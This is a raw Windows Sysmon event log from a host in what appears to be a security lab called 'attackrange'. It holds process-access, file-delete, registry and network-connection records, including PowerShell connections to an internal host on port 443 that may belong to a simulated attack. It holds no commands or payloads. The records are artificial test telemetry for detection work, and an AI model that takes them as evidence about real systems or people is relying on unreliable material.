18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084289Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084288Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084287Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084286Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084285Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084284Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084283Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084282Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084281Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084280Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084279Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084278Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084277Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084276Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084275Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084274Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035084303Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:00.132{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC713C3A40C3FD0CC980B46DADAFF01B,SHA256=CAD8E10EF461BED7CAFC9B90E74409058ABF8050961F8C70BABE6361DF4A7241,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084305Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:01.179{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16383FC8AC45500AF857944929F6FB6D,SHA256=F8636C8113FA0E85B2132BDBE61DC520BF18607F421D0BAB1F32D08F456605B8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084304Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:01.047{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=043248A8FFC0CD0189D0626476956B19,SHA256=BD277E4FCADA320E5729A3CD13CCC8CE5B1A9666A7FB35657D28ED31DA4F1E0A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084308Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:02.219{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A336302A70913FEB691177B68CB7BDD,SHA256=ED5354304272891B646CC5A6E909F63C6779F2C67AAB93C9177A0295C6DF8E2B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000035084307Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:26.265{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56589-false10.0.1.12-8000- 354300x800000000000000035084306Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:25.829{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56588-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084309Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:03.234{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2E1653B19FFE8085EE6F095BF845C0C,SHA256=9BD68B53C8A543BB3950FCB044670F14E0CDB60C0456D7A2BFA9B05553906794,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084310Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:04.299{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14DB3B0D3BE713B65DA263AB59CF4D0B,SHA256=846858D3048E5F63E36689AFB170FC85DE87E80687AB0DAD92622439B0BFED98,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084311Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:05.316{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A4B06F092E520B1AFEE4EFFC6917CC4,SHA256=66982DB47A5FCD6E499F9D252DE9F78A69A281BD13780DF61AD5311E85A08B46,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084313Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:06.896{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D84EE0BE0C1669FC46DD2DE1FC8A10DA,SHA256=29E71705B3C84520D7C17957CEB14FFEB57B8074FFC4401A754D4EBFFB68B5FA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084312Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:06.334{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC0A629F56CB2EDC831A11A4690F04AA,SHA256=FC1B338A9E280B9D9FB649A45D4D9E288343235B45C79EA6AB03D3C32D321D95,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084316Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:07.349{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6350EB5203CA0C95941A57B12CC06C84,SHA256=7F7C09B20E344A1C7D44B5182190E78682844F8CD7D5FB14ACCAD6D0F7A572A7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084315Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:31.835{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56591-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035084314Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:31.268{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56590-false10.0.1.12-8000- 23542300x800000000000000035084317Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:08.379{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C53838BDD6D408716EA1FA5D791E0D5E,SHA256=B67BE98BFD0D0D1873E9C1F93984411FFF2C2C4397FDA9503A9341297379C54B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084318Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:09.394{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEBF4A74591F01F9C912CD11E39E31A4,SHA256=419A5EE23588471F7527DA986DB18C386B5AEA1CC823156C9D20D8C4DB58D862,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084330Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:10.893{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=1CF438D86E7BD102138C0AA9C9FEF9C3,SHA256=E49DA8099179A589981221F89BAA71424E7140476987AB0B6741EB006CB34B68,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084329Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:10.413{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B0EFF05DBCF3E302021A42B392CF58B,SHA256=FBE8678693003C1C261E99252B1AE4DE3278ADA5A331610CED19178323EA1DF2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000035084328Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:10:10.346{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000035084327Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 
18:10:10.346{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x717ee6fe) 13241300x800000000000000035084326Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:10:10.346{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7a59d-0x8c25d478) 13241300x800000000000000035084325Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:10:10.346{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7a5a5-0xedea3c78) 13241300x800000000000000035084324Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:10:10.346{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7a5ae-0x4faea478) 13241300x800000000000000035084323Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:10:10.346{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000035084322Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:10:10.346{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x717ee6fe) 13241300x800000000000000035084321Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 
18:10:10.346{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7a59d-0x8c25d478) 13241300x800000000000000035084320Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:10:10.346{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7a5a5-0xedea3c78) 13241300x800000000000000035084319Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:10:10.346{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7a5ae-0x4faea478) 23542300x800000000000000035084332Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:11.431{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92D870F382BCE9B968619CB6229C717B,SHA256=FFD2C9039BFFE236C838C8D00FCE03250A7DDA796F91B9C5E679EA438E69D782,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084331Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 